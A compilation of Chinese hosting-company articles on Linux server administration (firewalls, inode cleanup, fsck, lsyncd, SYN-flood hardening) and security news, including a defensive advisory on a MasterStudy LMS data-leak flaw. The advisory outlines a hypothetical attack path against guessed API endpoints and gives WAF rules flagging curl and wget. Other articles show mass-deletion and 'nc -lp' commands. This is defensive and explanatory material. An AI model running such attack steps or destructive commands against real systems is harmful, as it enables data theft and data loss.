//开启了防火墙并随系统启动同时关闭所有外部对本机的访问,本机访问外部正常。 //关闭 sudo ufw disable //查看防火墙状态 sudo ufw status //开启/禁用相应端口或服务举例 sudo ufw allow 3306 //允许外部访问3306端口 sudo ufw delete allow 3306 禁止外部访问3306端口  sudo ufw allow from 118.89.153.162 //允许此IP访问所有的本机端口 sudo ufw deny smtp //禁止外部访问smtp服务 sudo ufw delete allow smtp //删除上面建立的某条规则 sudo ufw deny proto tcp from 10.0.0.0/8 to 192.168.0.1 port 22 //要拒绝所有的TCP流量从10.0.0.0/8 到192.168.0.1地址的22端口 //推荐使用 sudo apt-get install ufw sudo ufw enable sudo ufw default deny 总结 以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对主机吧的支持。 #### linux服务器空间inode已满解决方法 一、inode是什么? 理解inode,要从文件储存说起。 文件储存在硬盘上,硬盘的最小存储单位叫做"扇区"(Sector)。每个扇区储存512字节(相当于0.5KB)。 操作系统读取硬盘的时候,不会一个个扇区地读取,这样效率太低,而是一次性连续读取多个扇区,即一次性读取一个"块"(block)。这种由多个扇区组成的"块",是文件存取的最小单位。"块"的大小,最常见的是4KB,即连续八个 sector组成一个 block。 文件数据都储存在"块"中,那么很显然,我们还必须找到一个地方储存文件的元信息,比如文件的创建者、文件的创建日期、文件的大小等等。这种储存文件元信息的区域就叫做inode,中文译名为"索引节点"。 linux inode已满解决方法,主机吧转载了网友解决方法,希望可以帮到大家。 df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/dev01-root 75G 58G 14G 82% / udev 2.0G 4.0K 2.0G 1% /dev tmpfs 396M 292K 396M 1% /run none 5.0M 0 5.0M 0% /run/lock none 2.0G 4.0K 2.0G 1% /run/shm /dev/sda1 228M 149M 68M 69% /boot 空间剩余14G,可以排除空间已满的情况。导致文件生成失败还有另一个原因,就是文件索引节点inode已满。 df -i Filesystem Inodes IUsed IFree IUse% Mounted on /dev/mapper/dev01-root 4964352 4964352 0 100% / udev 503779 440 503339 1% /dev tmpfs 506183 353 505830 1% /run none 506183 5 506178 1% /run/lock none 506183 2 506181 1% /run/shm /dev/sda1 124496 255 124241 1% /boot inodes 占用100%,果然是这个问题。 解决方法:删除无用的临时文件,释放inode。 查找发现 /tmp 目录下有很多sess_xxxxx的 session临时文件。 ls -lt /tmp | wc -l 4011517 进入/tmp目录,执行find -exec命令 sudo find /tmp -type f -exec rm {} \; 如果使用rm *,有可能因为文件数量太多而出现Argument list too long错误,关于Argument list too long错误可以参考《linux Argument list too long错误解决方法》 除了/tmp的临时文件外,0字节的文件也会占用inode,应该也释放。 遍历寻找0字节的文件,并删除。 sudo find /home -type f -size 0 -exec rm {} \; 删除后,inode 的使用量减少为19%,可以正常使用了。 df -i Filesystem Inodes IUsed IFree IUse% Mounted on /dev/mapper/dev01-root 4964352 940835 4023517 19% / udev 503779 440 503339 1% /dev tmpfs 506183 353 505830 1% /run none 506183 5 506178 1% /run/lock none 506183 2 506181 1% /run/shm /dev/sda1 124496 255 124241 1% /boot --------------------- 作者:傲雪星枫 来源:CSDN 原文:https://blog.csdn.net/fdipzone/article/details/41558685 #### Linux系统云服务器如何查看/启用网站日志 查看网站日志 BT环境 进入BT管理面板中,点击左侧“网站”-对应站点--点击“设置”-配置文件,查看access_log行 (access_log为网站访问日志 ,error_log为网站错误日志) WDCP环境 进入wdcp点击左边“站点管理”-“站点列表”,找到要设置的站点,点站点后面对应的“编“按钮,勾中”开启访问日志“即可,日志文件目录 /home/web_logs 自建web环境 通过ssh方式远程登录服务器内,运行如下命令netstat  -tnpl 查看监听80或443端口web服务的PID 运行如下命令ll  /proc/2908/fd /home/web_logs/xxx_access.log 即为访问日志。 查看网站配置文件 通过ssh方式远程登录服务器内,运行如下命令netstat  -tnpl      # 查看监听80或443端口web服务的pid号 ll /proc/pid号/exe 可查出当前web服务目录(/www/server/nginx),进入到web服务目录下conf目录(命令:cd /www/server/nginx/conf ),查看nginx.conf (命令:vi nginx.conf ) 文件可查到站点配置文件所在路径 apache环境配置文件为httpd.conf (命令:vi httpd.conf) 进入对应路径目录(命令:cd  /www/server/panel/vhost/nginx/ )下即可看到相应网站的配置文件。如果配置文件较多,可以运行如下命令grep 'xxx.com' * 搜索出对应的配置文件。 启用网站日志 Nginx vi编辑站点配置文添加 保存退出并重启nginx服务。 Apache 先按上述方式找到apache服务路径进入conf目录, 查看httpd.conf文件, 查看logFormat格式 再vi 编辑站点配置文件,添加: 保存退出并重启aapche服务。 #### linux系统变为只读出现提示Read-only file system的解决办法 问题描述:linux系统变为只读,出现提示Read-only file system, 如图所示: 问题原因:系统没有正常关机,导致虚拟磁盘出现文件系统错误. 说明:此修复可能会导致个别文件及数据丢失,修复之前建议做好文件备份工作. 解决方法:使用 fsck 手动修复磁盘文件,具体操作如下:   1.使用mount查看磁盘加载情况 mount:   用于查看哪个模块输入只读,一般显示为: [root@localhost ~]# mount sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime) debugfs on /sys/kernel/debug type debugfs (rw,relatime) mqueue on /dev/mqueue type mqueue (rw,relatime) hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime) binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime) tmpfs on /run/user/0 type tmpfs (rw,nosuid,nodev,relatime,size=388136k,mode=700) /dev/vdb1 on /home type ext4 (ro,relatime,data=ordered) [root@localhost ~]# 查看ro挂载的分区,如果发现有ro说明此磁盘是只读状态(最好也检查下/etc/fstab查看配置文件是否就已经设置为只读挂载权限) 2.卸载只读分区 [root@localhost ~]#umount /dev/vdb1 如果发现有提示“device is busy”,找到是什么进程使得他busy 比如可执行/etc/init.d/httpd stop 等命令停止正在运行的一些服务 fuser -m /home 将会显示使用这个模块的pid fuser -mk /home 将会直接kill那个pid 3.fsck修复磁盘文件 [root@localhost ~]#fsck -fvy /home 修复异常的磁盘分区 然后重新mount即可。 4、直接remount或者是mount -a,命令为 [root@localhost ~]# mount -o rw,remount /home 最后启动开始停止的服务/etc/init.d/httpd start也可执行reboot重启下服务器让系统自动启动运行的服务.   #### LINUX系统如何使用软件异地同步数据(灾备) rsync是linux系统下的数据镜像备份工具。使用快速增量备份工具Remote Sync可以远程同步,支持本地复制,或者与其他SSH、rsync主机同步 一、宝塔环境: 有宝塔软件商城支持,参考:https://www.bt.cn/bbs/thread-98022-1-1.html 二、其他环境: 实现工具:lsyncd  lsyncd结合了inotify + rsync,Lsyncd监视本地目录树事件监视器接口(inotify或fsevents)。它聚合和组合事件几秒钟, 然后生成一个(或多个)进程(es)来同步更改。  1、安装(lsyncd基于rsync,且要求rsync >= 3.1): # 查看rsync版本 # rsync -v 1.1、rsync< 3.1才执行以下内容,rsync >= 3.1跳过1.1此步,直接执行1.2 #查看当前rsync版本 rsync -v #如果版本太低,直接卸载 yum -y remove rsync #下载rsync源码 wget http://soft.xiaoz.org/linux/rsync-3.1.3.tar.gz #解压 tar -zxvf rsync-3.1.3.tar.gz #进入目录 cd rsync-3.1.3 #编译安装 ./configure make install 最后再次输入rsync -v查看版本是否升级成功 1.2 更新epel源 yum -y install epel-release 1.3安装lsyncd #安装lsyncd yum -y install lsyncd #查看lsyncd版本 lsyncd --version #配置文件位于/etc/lsyncd.conf  -- 是注释符 2、 配置 2.1 配置免密登陆 如果想要将主A:192.168.0.1的数据同步到备B:192.168.0.2,主A:192.168.0.1必须拥有免密码登录备B:192.168.0.2的权限, 可以设置密钥登录来完成。只需要两条命令即可,下面的命令在主A:192.168.0.1服务器执行: #生成密钥文件 ssh-keygen -t rsa #将公钥拷贝到B服务器 -p 配置是ssh端口 ,输入密码登陆拷贝 Bssh-copy-id root@192.168.0.2 -p 22000  #测试  ssh root@192.168.0.2  -p 22000 2.2 配置lsyncd 2.2.1 部分参数说明 settings为全局配置,部分参数如下: logfile:日志文件路径 statusFile:进程路径 insist:继续运行,即使有失败的目标。 statusInterval:多少秒写入文件,默认是10s sync为同步配置,部分参数如下: source:本地文件目录 host:远程服务器地址 targetdir:远程目标目录 port:目前主机SSH端口号,默认为22000 2.2.2 配置文件 vi /etc/lsyncd.conf修改配置文件,注释或删除掉默认的最后一行,然后添加自己的配置 settings {    logfile    = "/tmp/lsyncd.log",    statusFile = "/tmp/lsyncd.status",    insist = true,    statusInterval = 10 } sync {    default.rsyncssh,   source="/home",    host="192.168.1.2",    targetdir="/home",    rsync = {      archive = true,      compress = false,      whole_file = false    },    ssh = {      port = 220000    } } 继续输入命令lsyncd -nodaemon /etc/lsyncd.conf运行查看下是否有报错,如果有报错根据报错情况检查修改 如果没有报错直接退出后输入命令:systemctl start lsyncd启动lsyncd即可。 相关命令: #启动 systemctl start lsyncd #停止 systemctl stop lsyncd #重启 systemctl restart lsyncd #设置开机自动启动 systemctl enable lsyncd #### Linux系统服务器如何开放端口和关闭端口 查询 netstat -anp  所有开放端口信息 二、关闭端口号: iptables -A OUTPUT -p tcp --dport 端口号-j DROP   三、打开端口号: iptables -A INPUT -ptcp --dport 8099 -j ACCEPT service iptables save 保存设置   四、以下是linux打开端口命令的使用方法。    nc -lp 23 &(打开23端口,即telnet)    netstat -an | grep 23 (查看是否打开23端口)  五、linux打开端口命令每一个打开的端口,都需要有相应的监听程序才可以 #### Linux系统服务器如何查看哪个IP跑满宽带 Linux系统下如果服务器带宽跑满了,查看跟哪个ip通信占用带宽比较多,可以通过iftop命令进行查询,使用方法如下: 1 安装方法【软件官网地址:http://www.ex-parrot.com/~pdw/iftop/】   CentOS系统运行:yum install iftop Debian系统 运行:apt-get install iftop 在安装过程中需要我们输入 y 继续的步骤,在安装过程中会提醒我们的。安装完毕之后,就可以使用iftop命令激活监控。 2 安装好后在服务器执行iftop -i eth1就可以查看服务器公网网卡带宽使用情况(如果只执行iftop默认检测第一块网卡使用情况,这样查的会是内网网卡eth0。     iftop界面含义如下 第一行:带宽显示 中间部分:外部连接列表,即记录了哪些ip正在和本机的网络连接 中间部分右边:实时参数分别是该访问ip连接到本机2秒,10秒和40秒的平均流量=>代表发送数据,<= 代表接收数据 底部三行:表示发送,接收和全部的流量 底部三行第二列:为你运行iftop到目前流量 底部三行第三列:为高峰值 底部三行第四列:为平均值 通过iftop的界面很容易找到哪个ip在占用网络流量,这个是ifstat做不到的。不过iftop的流量显示单位是Mb,这个b是bit,是位,不是字节,而ifstat的KB,这个B就是字节了,byte是bit的8倍。   进入iftop画面后的一些操作命令(注意大小写) 按h切换是否显示帮助; 按n切换显示本机的IP或主机名; 按s切换是否显示本机的host信息; 按d切换是否显示远端目标主机的host信息; 按t切换显示格式为2行/1行/只显示发送流量/只显示接收流量; 按N切换显示端口号或端口服务名称; 按S切换是否显示本机的端口信息; 按D切换是否显示远端目标主机的端口信息; 按p切换是否显示端口信息; 按P切换暂停/继续显示; 按b切换是否显示平均流量图形条; 按B切换计算2秒或10秒或40秒内的平均流量; 按T切换是否显示每个连接的总流量; 按l打开屏幕过滤功能,输入要过滤的字符,比如ip,按回车后,屏幕就只显示这个IP相关的流量信息; 按L切换显示画面上边的刻度;刻度不同,流量图形条会有变化; 按j或按k可以向上或向下滚动屏幕显示的连接记录; 按1或2或3可以根据右侧显示的三列流量数据进行排序; 按<根据左边的本机名或IP排序; 按>根据远端目标主机的主机名或IP排序; 按o切换是否固定只显示当前的连接; 按f可以编辑过滤代码; 按!可以使用shell命令; 按q退出监控。 #### linux系统服务器防御SYN攻击步骤详解 一、默认syn配置sysctl -a | grep _syn net.ipv4.tcp_max_syn_backlog = 1024 net.ipv4.tcp_syncookies = 1 net.ipv4.tcp_synack_retries = 5 net.ipv4.tcp_syn_retries = 5 tcp_max_syn_backlog 是SYN队列的长度,加大SYN队列长度可以容纳更多等待连接的网络连接数。 tcp_syncookies是一个开关,是否打开SYN Cookie 功能,该功能可以防止部分SYN攻击。 tcp_synack_retries和tcp_syn_retries定义SYN 的重试连接次数,将默认的参数减小来控制SYN连接次数的尽量少。二、修改syn配置ulimit -HSn 65535 sysctl -w net.ipv4.tcp_max_syn_backlog=2048 sysctl -w net.ipv4.tcp_syncookies=1 sysctl -w net.ipv4.tcp_synack_retries=2 sysctl -w net.ipv4.tcp_syn_retries=2 三、添加防火墙规则#Syn 洪水攻击(--limit 1/s 限制syn并发数每秒1次) iptables -A INPUT -p tcp --syn -m limit --limit 1/s -j ACCEPT #防端口扫描 iptables -A FORWARD -p tcp --tcp-flags SYN,ACK,FIN,RST RST -m limit --limit 1/s -j ACCEPT #防洪水ping iptables -A FORWARD -p icmp --icmp-type echo-request -m limit --limit 1/s -j ACCEPT 四、添加开机启动最后别忘记将二、三、里面的命令写到/etc/rc.d/rc.local以上就是脚本之家分享给大家的关于linux 防御SYN攻击步骤详解的全部内容,希望对大家有所帮助。感兴趣的朋友可以继续参阅本站其他相关专题,如有不足之处,欢迎留言指出。感谢朋友们对本站的支持! #### LockBit 黑客组织宣称已入侵波音公司,扬言“六天内拿不到赎金将公布内部资料” 10 月 31 日消息,安全公司 VX Underground 日前发现黑客团队 Lockbit 在暗网论坛发布公告,声称他们已经成功入侵波音公司,并获得了大量内部资料,扬言拿不到赎金就将公布相关内容。 据悉,Lockbit 团队给予了波音公司 6 天时间与其联系,在期限之前不会公开内部资料,但若波音迟迟未主动联系,黑客就会将相关内容公开放出。 Lockbit 团队表示,他们使用一个未公布的零日漏洞入侵了波音,但并未披露相关漏洞细节,而波音官方则表示正在评估确认 LockBit 的说法。 相关知识: LockBit 团队是目前全球最猖獗的黑客组织,以“勒索软件即服务”(ransomware-as-a-service,RaaS)提供一系列黑客服务。该组织声称入侵了超过 1600 个组织。从 2020 年起,光是美国的受害者,就支付了超过 9 千万美元(当前约 6.59 亿元人民币)的赎金。 今年年中 LockBit 团队黑入了台积电,勒索 7 千万美元(当前约 5.12 亿元人民币),还造成日本第一大港名古屋港货柜调度系统停摆了一整天。 #### Lumma 恶意软件曝光:恢复过期 cookies,可劫持谷歌账户 11 月 23 日消息,网络安全公司 Hudson Rock 专家 Alon Gal 率先发现了名为 Lumma(又名 LummaC2)的恶意软件,黑客利用它恢复过期的谷歌 cookie,来劫持谷歌账号。 会话 cookies 是一种特殊的网络 cookies,用户确保用户在一段时间内保持登录状态。网站和浏览器出于安全方面的考虑,都会对 cookies 时效进行限制,避免被滥用。 Lumma 恶意软件使用恢复文件中的密钥恢复已经过期的 cookies(仅适用于谷歌 cookies),不过这种恢复仅限 1 次,每个密钥可以使用 2 次。 攻击者通过订阅制方式收费,每月费用为 1000 美元(IT之家备注:当前约 7160 元人民币)。目前该恶意软件尚未得到安全研究人员或谷歌的验证,不过窃取者 Rhadamanthys 在最近的更新中宣布了类似的功能。 在联系谷歌几天后,Lumma 的开发人员发布了一项更新,声称这是一个额外的修复程序,以绕过谷歌为防止 cookie 恢复而引入的新限制。 #### MAC OS 更换DNS服务器教学 选取苹果菜单 >“系统偏好设置” 找到网络图标,点击进入 从列表中选择想要使用的网络连接服务(例如 WIFI 或以太网),然后点按“高级” 找到DNS的标签,然后点击左下角“+”,将223.5.5.5和223.6.6.6这两个补充上去,之后点击"好" 返回到上一级,点击“应用” 以上就是MAC OS 更换DNS服务器图文教学,希望可以帮助大家。 #### MacSync恶意软件实现重大进化:首次系统化突破macOS公证与Gatekeeper安全模型 核心事件:macOS核心安全防线被系统性绕过 安全公司Jamf Threat Labs近期披露,信息窃取恶意软件MacSync 出现了具备重大战术突破的新变种。该变种的核心威胁在于:它成功获取了有效的苹果开发者代码签名并通过了苹果官方公证,从而完全规避了macOS Gatekeeper的安全检查。这是macOS恶意软件在规避苹果内置安全机制方面的一次显著进化,标志着威胁行为者已开始系统性地攻击苹果的安全信任链条。 技术深度解析:攻击链全貌与高级规避技术 此次攻击链呈现出高度的专业性和隐蔽性,其技术实现可分为四个关键阶段: 阶段一:获取合法身份,突破第一道防线 攻击向量:恶意软件被封装在一个名为 zk-call-messenger-installer-3.9.2-lts.dmg 的磁盘镜像中,伪装成合法通讯软件的安装程序。 关键突破:该软件包拥有合法的开发者团队ID(GNJLS3UYZ4) 且通过了苹果的公证服务。这意味着: 代码签名有效:证明该应用由苹果注册开发者创建,且自签名后未被篡改。 公证验证通过:苹果服务器已扫描该软件,未发现已知恶意行为(在扫描时)。 安全影响:macOS Gatekeeper的默认设置是“允许从App Store和已识别的开发者”。拥有合法签名和公证的恶意软件,在用户首次打开时不会触发“无法验证开发者”的明确拦截警告,仅显示常规的打开提示,极大地降低了用户的戒备心。 阶段二:规避自动化沙箱与分析环境 恶意软件在部署后,实施了多层次的主动反分析与逃避策略: 文件膨胀策略:安装包内嵌入了大量无意义的诱饵PDF文件,将DMG体积人为膨胀至25.5MB。此举旨在绕过那些对扫描文件大小设限的自动化安全沙箱或云端检测引擎,确保恶意负载能逃过初步的静态扫描。 环境感知检查:执行前,恶意代码会主动检测互联网连接状态。如果发现设备处于断网或受控的隔离环境(常见于沙箱或分析师虚拟机),则可能中止恶意行为,以此隐藏其真实意图。 痕迹清除机制:核心负载(Payload)执行后,会自动删除执行过程中使用的中间脚本和文件,实施“用后即焚”,增加安全人员取证的难度。 阶段三:数据窃取能力分析 作为Mac.C恶意软件家族的衍生物,MacSync的目标明确,专门窃取高价值数字资产: iCloud钥匙串凭证:获取存储于本地钥匙串中的各类网站、应用密码及安全笔记。 浏览器数据:提取Chrome、Safari、Firefox等主流浏览器中保存的密码、Cookie及历史记录。 系统信息与文件:收集主机详细元数据,并针对性窃取加密货币钱包文件(如Electrum, Exodus等)。 Gatekeeper安全模型的局限性反思 此次事件暴露了以Gatekeeper和公证为核心的应用分发安全模型存在的固有弱点: 信任基于“瞬间快照”:苹果公证是一次性静态扫描。威胁行为者可以先提交一个“干净”版本通过公证,随后通过服务器动态下发恶意负载,或在后续更新中注入恶意代码。公证无法保证软件在运行时的持续清白。 开发者证书的滥用风险:合法开发者证书的泄露、盗用或被恶意注册,是此模型的“阿喀琉斯之踵”。一旦证书落入攻击者之手,即可用于签署任何恶意软件。 用户提示疲劳:即便有提示,面对看似“已验证”的应用,大量用户仍会习惯性点击“打开”,安全提示的实际威慑效果被削弱。 【主机帮】企业级检测与防护响应指南 对于企业安全管理(建议立即执行) 强化终端策略,超越Gatekeeper: 部署EDR(端点检测与响应)解决方案,监控所有进程的异常行为(如钥匙串访问、浏览器数据读取、可疑网络外连),而非仅仅依赖代码签名。 利用MDM(移动设备管理)工具,实施应用白名单策略,只允许授权签名的应用运行。 在防火墙或SWG(安全Web网关)上阻止与已知恶意C2服务器的通信。 撤销证书的快速响应: 关注苹果开发者证书撤销列表更新。本次事件中,苹果在收到通报后已迅速撤销了被滥用的证书(Team ID: GNJLS3UYZ4)。确保您的安全系统能同步此类证书撤销信息。 用户安全意识再培训: 明确告知员工:“已公证”不等于“绝对安全”。应仅从官方App Store或绝对可信的企业内部门户下载软件。对于任何DMG/PKG安装包,即使没有警告,也需保持警惕。 对于个人用户与开发者 检查系统隐私与安全设置: 考虑将Gatekeeper设置调整为 “仅允许来自App Store的应用”(最高安全级别),但此选项可能影响工作流。 定期检查 系统设置 > 隐私与安全性,查看是否有未知应用请求了“完全磁盘访问”或“辅助功能”等关键权限。 开发者自查: 严格保管开发者账号与证书私钥,启用双因素认证。 监控自己证书签名的应用,警惕被仿冒。 威胁演变趋势与展望 MacSync的此次进化并非偶然,它反映了macOS恶意软件领域的明确趋势: 攻击专业化:从利用脚本和漏洞,转向获取和滥用合法的开发资源与供应链。 规避前沿化:综合利用静态伪装(公证签名)、动态检测(环境感知)和反取证(痕迹清理)技术。 目标金融化:从广义的信息窃取转向精准掠夺加密货币等可直接变现的数字资产。 结论 MacSync事件是一记响亮的警钟:在macOS平台上,合法的代码签名和公证已不再是安全性的可靠保证。威胁行为者正以前所未有的 sophistication(复杂精密性)攻击苹果安全模型中最脆弱的一环——对人的信任和对“静态验证”的依赖。 防御必须相应升级,从单纯的“验证来源”转向 “持续监控行为” 。对于企业而言,这意味着必须部署能够洞察终端运行时行为的深度安全解决方案;对于个人用户,则需重塑“下载即信任”的习惯,在数字世界保持永恒的警惕。 (主机帮将持续追踪高级威胁动态,为您提供前沿的攻防分析与可落地的安全加固方案。) #### MAC苹果IOS系统如何打开终端ping和跟踪路由 1、打开Launchpad 2、点击“其他” 3、打开“终端” 如何ping? 在终端窗口中输入ping 和您的域名即可,如:“ping  testchan.gotoip1.com” 如何跟踪路由? 在终端窗口中输入traceroute 空格和您的域名即可,如:“traceroute  testchan.gotoip1.com” 跟上图片差不多操作 如何测试端口? 在终端窗口中输入telnet  空格和您要测试的服务器IP 空格 端口号即可,如:“telnet  192.168.7.201  21” 常用的端口(若端口没有对应的服务监听,即没使用,测试是无法显示反馈信息的): 21:FTP端口 25:SMTP端口 110:POP3端口 80:WEB端口 1433:MSSQL端口 3306:MYSQL端口     #### MasterStudy LMS Pro插件曝信息泄露漏洞,数万在线教育网站面临数据裸奔风险 漏洞事件概览:在线教育平台的“数据后门” 漏洞编号:CNVD-2026-00009(对应CVE-2025-64213)危害等级:高危(CVSS评分待定,但CNVD评定为高危害)影响范围:WordPress MasterStudy LMS Pro插件 < 4.7.16 版本漏洞类型:敏感信息泄露公开时间:2026年1月4日攻击特征:无需身份验证,远程攻击者可利用该漏洞访问本应受保护的敏感数据 深度技术剖析:这不是普通的信息泄露 漏洞本质:不当的数据隔离机制 MasterStudy LMS Pro作为WordPress平台上最受欢迎的在线教育插件之一,在全球范围内被数万教育机构、培训平台和企业内训系统使用。此次漏洞的核心在于: “敏感信息插入不当”的技术解读: 权限校验缺失:插件未能正确验证用户访问特定数据的权限 API端点暴露:用于获取敏感数据的接口未实施适当的访问控制 数据过滤不严:数据库查询可能直接返回包含所有字段的结果集 受影响数据可能包括: 用户隐私数据:学生/学员的真实姓名、邮箱、手机号、学习进度 财务敏感信息:课程购买记录、支付凭证、发票信息 教学内容资产:付费课程视频链接、课件下载地址、考试题库 运营核心数据:教师薪酬信息、平台营收统计、学员分布数据 攻击场景模拟:黑客如何利用此漏洞 攻击路径推演(基于同类漏洞模式) 步骤1:信息收集 攻击者扫描网络,识别使用MasterStudy LMS Pro插件的网站 (特征:包含 /wp-content/plugins/masterstudy-lms-pro/ 路径) 步骤2:漏洞探测 尝试访问敏感API端点,如: - /wp-json/masterstudy/v2/user-data - /wp-json/masterstudy/v2/courses/enrolled-users - /wp-json/masterstudy/v2/payments/transactions 步骤3:数据提取 构造特定请求,绕过权限检查,直接下载: - 所有注册用户列表(含联系方式) - 所有课程参与记录 - 完整的交易历史 步骤4:数据变现 - 将学生数据打包出售给竞争对手或营销机构 - 利用支付信息尝试撞库攻击 - 盗版付费课程内容在暗网分发 真实危害评估 假设一个中型在线教育平台: 注册学员:10,000人 付费课程:200门 月度交易:5,000笔 数据泄露后果: 直接经济损失:学员退款、课程盗版损失、GDPR罚款(如适用) 品牌信誉损害:学员信任崩塌,新增用户锐减 法律合规风险:违反《个人信息保护法》等法规 连带攻击风险:泄露的数据成为社工库,用于精准钓鱼 紧急修复指南:四步彻底消除风险 第一步:立即确认与隔离(30分钟内完成) # 检查插件版本 cd /path/to/wordpress/wp-content/plugins/ ls -la | grep masterstudy-lms-pro # 检查版本号 cat masterstudy-lms-pro/readme.txt | grep -i "stable tag" # 立即备份(但暂不传输到异地,防止备份包含漏洞) tar -czf masterstudy-backup-$(date +%Y%m%d).tar.gz masterstudy-lms-pro/ 第二步:核心修复措施(必须执行) 方案A:立即升级(强烈推荐) 1. 登录WordPress后台 → 插件 → 已安装插件 2. 找到 MasterStudy LMS Pro 3. 点击“立即更新”至 4.7.16 或更高版本 4. 更新后清除缓存:CDN缓存、对象缓存、页面缓存 方案B:手动修补(如无法自动更新) 1. 从官网下载4.7.16版本:https://wordpress.org/plugins/ 2. 备份当前插件目录 3. 完全删除旧版本:rm -rf masterstudy-lms-pro/ 4. 上传并解压新版本 5. 重新激活插件 第三步:修复验证(确保漏洞已封堵) <?php // 验证脚本示例(需放置于网站根目录临时运行) // 检查敏感端点是否仍可未授权访问 $test_endpoints = [ '/wp-json/masterstudy/v2/users', '/wp-json/masterstudy/v2/payments', '/wp-json/masterstudy/v2/courses/private', ]; foreach ($test_endpoints as $endpoint) { $url = home_url($endpoint); $response = wp_remote_get($url, ['timeout' => 10]); $code = wp_remote_retrieve_response_code($response); if ($code === 200) { // 仍然返回数据,说明修复不彻底 error_log("警告:端点 {$endpoint} 仍可未授权访问"); } } ?> 第四步:事件追溯与审计 1. 检查访问日志,搜索异常请求模式 grep -i "masterstudy\|wp-json" /var/log/nginx/access.log | grep -v "admin" 2. 数据库审计,查看异常数据查询 mysql -e "SHOW FULL PROCESSLIST;" | grep -i select 3. 用户通知(如确认泄露) - 根据法规要求通知受影响用户 - 建议用户修改密码(如密码可能泄露) - 提供信用监控建议 深度防御:构建WordPress站点的多层安全防护 第一层:核心安全加固(通用必做项) # Nginx配置强化(节选) location ~* /wp-content/plugins/.*\.(php|phtml|php3|php4|php5|php7)$ { deny all; } # 限制XML-RPC访问(减少攻击面) location = /xmlrpc.php { deny all; return 403; } # 保护wp-admin目录 location /wp-admin { allow 您的办公网IP; deny all; auth_basic "Admin Area"; auth_basic_user_file /etc/nginx/.htpasswd; } 第二层:WAF专项防护(针对此漏洞) 百度云防护WAF配置方案 规则一:阻止对MasterStudy敏感端点的未授权访问 规则名称:MasterStudy API权限验证 匹配条件: - URI Path 包含 "/wp-json/masterstudy/" - 且 Cookie Name [名称为"wordpress_logged_in"] 不存在 处置动作:拦截 说明:所有MasterStudy的REST API请求必须携带登录Cookie 规则二:检测异常数据下载行为 规则名称:防止教育数据批量下载 匹配条件: - URI Path 包含 "/masterstudy" - 且 User-Agent 包含 "Python" 或 "curl" 或 "wget" - 且 Referer 为空 统计信息:IP 统计时长:60秒 阈值:10次 处置动作:JS挑战 规则三:保护用户隐私数据 规则名称:用户数据接口频率限制 匹配条件: - Query String Parameter [名称为"user_id"] 存在 - 或 Query String Parameter [名称为"student_id"] 存在 统计信息:IP 统计时长:300秒 阈值:50次 # 5分钟内查询50个不同用户ID视为异常 处置动作:拦截 为什么需要云WAF? 虚拟补丁:在插件官方修复前提供临时防护 零日防护:即使未来出现新漏洞,WAF规则可快速响应 日志审计:完整记录所有攻击尝试,用于取证分析 降低误杀:相比直接修改插件代码,WAF策略可灵活调整 第三层:数据库安全隔离 -- 为WordPress数据库创建专用账户,限制权限 CREATE USER 'wp_masterstudy'@'localhost' IDENTIFIED BY '强密码!@#2026'; GRANT SELECT, INSERT, UPDATE ON `wordpress_db`.`wp_masterstudy_*` TO 'wp_masterstudy'@'localhost'; -- 注意:不授予DELETE、DROP等危险权限 第四层:监控与告警体系 # 实时监控脚本示例 #!/bin/bash # 监控MasterStudy相关访问 tail -f /var/log/nginx/access.log | grep --line-buffered "masterstudy" | \ while read line; do ip=$(echo $line | awk '{print $1}') path=$(echo $line | awk '{print $7}') # 检测异常模式 if [[ $path == *"wp-json/masterstudy/v2"* ]]; then if ! echo $line | grep -q "wordpress_logged_in"; then echo "警报:未授权访问MasterStudy API - IP: $ip, PATH: $path" # 自动加入临时黑名单 iptables -A INPUT -s $ip -j DROP fi fi done 产品解决方案推荐:构筑教育平台专属防线 1. 【百度云防护WAF专业版】- 核心应用防护 针对场景:保护在线教育平台的应用层安全 精准规则配置:按上述方案配置MasterStudy专属防护规则 API安全防护:保护REST API接口,防止数据泄露 CC攻击防御:防止恶意刷课、批量注册等攻击 网页防篡改:保护课程页面内容不被恶意修改 2. 【高防服务器/高防IP】- 基础架构防护 针对场景:在线教育平台经常成为DDoS攻击目标 超大带宽防护:抵御针对直播课程、大文件下载的流量攻击 源站隐藏:真实服务器IP不暴露,防止直接攻击 BGP线路优化:确保全国学员访问稳定 3. 【SSL证书】- 数据加密传输 针对场景:保护学员隐私数据在传输过程中不被窃听 全站HTTPS:视频流、课件下载、在线考试全部加密 EV SSL证书:显示绿色地址栏,增强学员信任感 合规要求:满足等保、GDPR等法规对数据传输加密的要求 4. 【定期安全审计服务】- 持续安全运营 针对场景:教育平台业务复杂,需要持续安全监控 月度漏洞扫描:定期检测插件、主题、核心漏洞 配置审计:检查服务器、数据库、权限配置 渗透测试:模拟黑客攻击,发现潜在风险 应急响应:出现安全事件时,专业团队快速介入 法律合规与风险管理 个人信息保护法(中国)合规要点 1. 告知义务:如发生数据泄露,需及时通知用户和主管部门 2. 补救措施:立即采取补救措施,防止损害扩大 3. 记录留存:安全事件的处置记录需至少保存三年 4. 责任认定:如因未及时修复已知漏洞导致泄露,可能承担法律责任 教育行业特殊要求 未成年信息保护:如涉及未成年人数据,需实施更严格保护 考试数据安全:在线考试系统的防作弊和数据完整性 内容版权保护:付费课程内容的防盗版措施 站长总结:安全是教育平台的生存底线 MasterStudy LMS Pro漏洞事件再次警示我们: 对教育平台而言,数据安全不是“附加功能”,而是“生存底线”。学员将自己的个人信息、学习记录、支付数据托付给平台,这种信任一旦被破坏,几乎无法重建。 三点核心建议: 立即行动:所有使用MasterStudy LMS Pro插件的站点,必须在24小时内完成升级验证 纵深防御:不要依赖单一防护措施,建立从网络到应用的多层防护 持续监控:安全不是一次性任务,需要建立常态化的监控和响应机制 主机帮为在线教育平台提供:专属安全加固方案,包括WAF规则配置、服务器安全加固、数据加密传输和定期安全审计。我们理解教育数据的高度敏感性,并提供符合教育行业特殊要求的安全解决方案。 延伸服务:如果您是教育平台负责人,不确定自己的网站是否受影响,或需要专业团队协助修复和加固,主机帮提供免费的安全检测服务。我们可协助您完成漏洞修复、WAF配置和长期安全监控方案设计。 #### MATLAB 开发商遭遇勒索软件攻击,官方下载服务中断 5 月 26 日消息,MATLAB 开发商 MathWorks 于美国东部时间 5 月 25 